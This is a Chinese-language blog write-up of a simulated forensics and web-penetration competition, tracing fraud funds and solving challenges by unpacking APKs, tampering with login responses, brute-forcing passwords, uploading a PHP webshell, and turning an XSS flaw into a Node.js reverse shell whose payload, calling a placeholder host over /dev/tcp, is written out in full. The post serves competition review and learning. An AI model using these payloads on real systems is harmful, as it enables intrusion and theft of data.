“ 一次模拟实战的比赛,综合考察取证、数据分析、网站渗透技能,本文仅用于比赛复盘、学习交流网络安全安全技术,请勿将技术用于非法用途,所产生的一切后果与本人本公众号无关。”
花了两天时间通关,学到了很多技巧和思路,遂记录下本次比赛解题过程
案情背景
解题过程
0x01 前言
1 欲望陷阱
打开题目生成的网站,下载案件背景文档case.docx
访问短信中APP的链接,下载
拖入GDA即可得到包名
2 踏雪寻痕
使用压缩程序解压apk,找到/assets/index.html
用浏览器打开,F12查看元素
访问其中链接到的网站,F12查看元素即可得到SDK,FLAG即为最后16位字符串
3 曲径通幽
使用题目给的模拟调证平台进行调证
在下载的表格中找到小付宝的支付订单号
对小付宝订单号进行调证
得到姓名,即为本题FLAG
4 按图索金
查看案情文件case.docx,得到三个泰州市游唐商业银行的收款账号
YT3226801028457114、YT3271228780646571、YT3271475162664434对三个银行卡号的账单详细进行调证
为了方便后续分析将第一、二、三次转账的账单信息文件分别命名为1/2/3.xlsx,打开Navicat,在本地新建一个数据库,将1/2/3.xlsx分别导入为表1/2/3,Navicat中右键点击表选择导入向导,选择Excel文件
选择表
另外两张表一样导入
根据案情,第一次受害人李楠于2022-02-10 12:23:34转账1w元,收款人为李珠轩,第二次于2022-02-10 18:45:02转账2w元,收款人为彭晓筠,第三次于2022-02-11 15:09:43转账2w元,收款人为游红美以时间为依据,筛选出每个收款人之后的支出记录
根据金额以及时间判断李珠轩分别转了5k给毛友易和桂夏槐,彭晓筠将2w转给了侯雅唱,游红美分别给朱怜南、萧雅隽和赵以柳转了4k、6k、1w。再去分别调取下一级收款人的账单信息导入数据库
毛友易给方南珍转了两次2.5k;桂夏槐给方吉玉转了2k,给余玉华转了3k;侯雅唱给罗新晴转了2w;朱怜南给罗新晴转了4k;萧雅隽给罗新晴转了6k;赵以柳给钟颖初转了1w。再去调取下一级的账单信息,导入数据库分析。可以得到方南珍将5k转给了罗新晴;方吉玉将2k转给了罗新晴;余玉华将2999转给了罗新晴;钟颖初将1w转给了罗新晴。整个资金链如下,最后所有赃款全部转到了罗新晴YT3291338144307289(本题FLAG)
5 以力破巧
在js文件中找到/api/flag/login
也可以用findsomething
访问/api/flag/login,得到本题FLAG
6 灯火阑珊
findsomething爬取到了一个/api/login接口
在JS文件里面找到
用ChatGPT分析登录逻辑
首先访问/api/login,抓包
放包
拦截返回包
修改result的值为matched
放包
成功进入登录页面后,根据第三题得到的手机号去调证平台社工库调证
得到几个账号密码
bp抓登录包以上面用户名密码为字典进行爆破
得到账号密码:lowfly/lyw13841228350以及本题FLAG
7 破茧取丝
接上题,登录后台
在客服管理中可以看到客服ID以及姓名
在聊天查询中可以根据用户名或手机号配合客服ID查询聊天记录
根据案件背景文档得到受害人李楠手机号18622334455,联系他的客服是小丽,查到小丽的ID
再去查询聊天记录
得到一个二维码,QR Research扫描得到网址
为apk下载地址
和第二题一样的思路,下载后解包,找到/assets/index.html
得到本题FLAG
8 与虎添翼
下载镜像,解压
用X-Ways进行分析,找到/www/server/panel/data/default.db其中记录了宝塔的操作日志等信息
使用Navicat打开,在logs表中找到登录的ip和端口,即为本题FLAG
9 刀斩虎翼
在联系我们处找到第1个FLAG
在邮箱登录的忘记密码处找到第2个FLAG
得到管理员账号为[email protected],使用第6题的密码lyw13841228350成功登录
在已发件记录中找到一个server.zip
下载后拿到第3个FLAG
同样在已发送记录里面找到一个重置好的密码,为第4个FLAG
在收件箱中找到拜托该用户帮忙重置OA密码的邮件
访问地址后面一串为第5个FLAG
使用zcq/HAU5MU4DUPT3UOUA登录OA系统
在个人设置处可以上传文件,没有任何过滤,上传一个PHP大马,抓包得到文件路径
访问大马并用密码登录
在/home/zcq/data.csv找到第6个FLAG
下载网站源码,用vscode打开,全局搜索FLAG
在index.php将FLAG写入到了数据库中,写一个获取数据库中数据的PHP脚本
上传到网站根目录后访问
拿到第7个FLAG
在OA平台的向老板提建议处存在一个XSS
使用XSS平台生成一个payload尝试打cookie
在XSS平台中得到的数据并没有cookie
访问一下后台,并没有任何认证机制
发现是使用Node.js编写的
尝试反弹shell
vps上监听本地8999端口
nc -lvnp 8999提建议处提交
<script>require('child_process').exec('bash -c "bash -i >& /dev/tcp/xxx.x.xxx.xx/8999 0>&1"')</script>
在/home/boss/work/ziliao目录中找到FLAG.txt
拿到第8个FLAG
在当前目录下有个sfz.png,可能是重要线索
base64 sfz.png > sfz.txt将其base64编码输出到sfz.txt,再复制sfz.txt中内容
使用https://www.ec95.com/进行解码转换为png文件
得到一张身份证,在/home/boss/work/kehu目录下找到kehu.xlsx
一样进行base64编码输出到txt文件中再复制内容进行解码
发现需要密码,使用passwarekit爆破
得到密码184428,对应上了前面得到的身份证后6位,打开xlsx得到第9个FLAG
复盘总结
通过本次比赛,学习到了一套较完整的取证、资金流分析思路,了解到了一点真实案件的侦办难度,最后的nodejs命令执行反弹shell,是作者第一次接触,之前从来没有想过通过一个XSS漏洞可以执行命令反弹shell,网安之路道阻且长,继续学习!
本文章仅对个人学习过程进行记录总结,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关,如果喜欢还请多多点赞和关注
持续更新学习笔记
您的关注就是对我最大的支持
原文始发于微信公众号(XiAnG学安全):知更无糖斟茶王者巅峰挑战赛
